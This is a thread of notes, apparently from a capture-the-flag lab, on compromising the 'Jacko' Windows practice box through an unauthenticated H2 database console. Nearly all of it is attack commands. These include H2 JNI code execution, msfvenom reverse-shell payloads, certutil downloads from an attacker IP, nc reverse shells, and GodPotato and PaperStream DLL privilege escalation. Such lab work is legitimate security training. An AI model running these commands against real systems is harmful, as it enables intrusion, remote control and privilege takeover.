Jacko (Intermediate, Windows, 2020) - H2 DB

WDavid404 commented 3 months ago

Keypoints:

H2 Database 1.4.199 - JNI Code Execution
Set up a good windows environment path : set PATH=%PATH%;C:\windows\system32;C:\windows;C:\windows\System32\Wbem;C:\windows\System32\WindowsPowerShell\v1.0\;C:\windows\System32\OpenSSH\;C:\Program Files\dotnet\
echo %PATH% --> confirm PATH variable
Check NET framwork version info: Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse
[PE].\godpotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.205 9001" (nc -t: telnetプロトコルで通信する)

WDavid404 commented 3 months ago

PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)

135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
5040/tcp  open  unknown       syn-ack ttl 125

8082/tcp  open  http          syn-ack ttl 125 H2 database http console
| http-methods: 
|_  Supported Methods: GET POST
|_http-favicon: Unknown favicon MD5: D2FBC2E4FB758DC8672CDEFB4D924540
|_http-title: H2 Console

9092/tcp  open  XmlIpcRegSvc? syn-ack ttl 125
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

445/tcp --> no useful info.

80/tcp

8082/tcp can login as "sa" without password

search exploit for h2 1.4.199 exploit -->

H2 Database 1.4.199 - JNI Code Execution

Based on the instruction by exploit, CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()'); works!

[kali] msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=4444 -f exe > rev.exe [sql] certutil -urlcache -f http://192.168.45.205/rev.exe c:/users/public/downloads/rev.exe [sql] c:/users/public/downloads/rev.exe --> got a reverse shell

whoami --> 'whoami' is not recognized as an internal or external command, operable program or batch file.

But if we execute whoami in c:/windows/system32 --> it works!

echo %PATH% set PATH=%PATH%;C:\windows\system32;C:\windows;C:\windows\System32\Wbem;C:\windows\System32\WindowsPowerShell\v1.0\;C:\windows\System32\OpenSSH\;C:\Program Files\dotnet\

whoami /priv

certutil -urlcache -f http://192.168.45.205/PrintSpoofer64.exe c:/users/public/downloads/PrintSpoofer64.exe c:/users/public/downloads/PrintSpoofer64.exe -i -c powershell.exe --> failed

powershell --> Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse --> NET is 4.0 --> we can use GodPotato-NET4.exe

[kali] msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=5555 -f exe > rev2.exe
certutil -urlcache -f http://192.168.45.205/GodPotato.exe  c:/users/public/downloads/GodPotato.exe
certutil -urlcache -f http://192.168.45.205/rev2.exe  c:/users/public/downloads/rev2.exe
c:/users/public/downloads/GodPotato.exe -cmd " c:/users/public/downloads/rev2.exe"

--> But failed...

certutil -urlcache -f http://192.168.45.205/nc64.exe  c:/users/public/downloads/nc.exe
.\godpotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.205 9001"
## Note: -t flag:  This makes it possible to use nc to script telnet sessions.

---> work!

WDavid404 commented 3 months ago

Another method for PE:

C:\Program Files (x86)\fiScanner See: https://benheater.com/proving-grounds-jacko/

C:\Program Files (x86)\PaperStream IP ---> PaperStream IP version is 1.42 --> PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation

[Kali]msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.205 LPORT=80 -f dll -o UninOldIS.dll
certutil -urlcache -f http://192.168.45.205/UninOldIS.dll  c:/users/public/downloads/UninOldIS.dll
certutil -urlcache -f http://192.168.45.205/49382.ps1  c:/users/public/downloads/49382.ps1
[Powershell] Set-ExecutionPolicy -ExecutionPolicy ByPass -Scope CurrentUser 
cp UninOldIS.dll c:/windows/temp/UninOldIS.dll
./49382.ps1

WDavid404 / PG-Box

Jacko (Intermediate, Windows, 2020) - H2 DB #49

Another method for PE: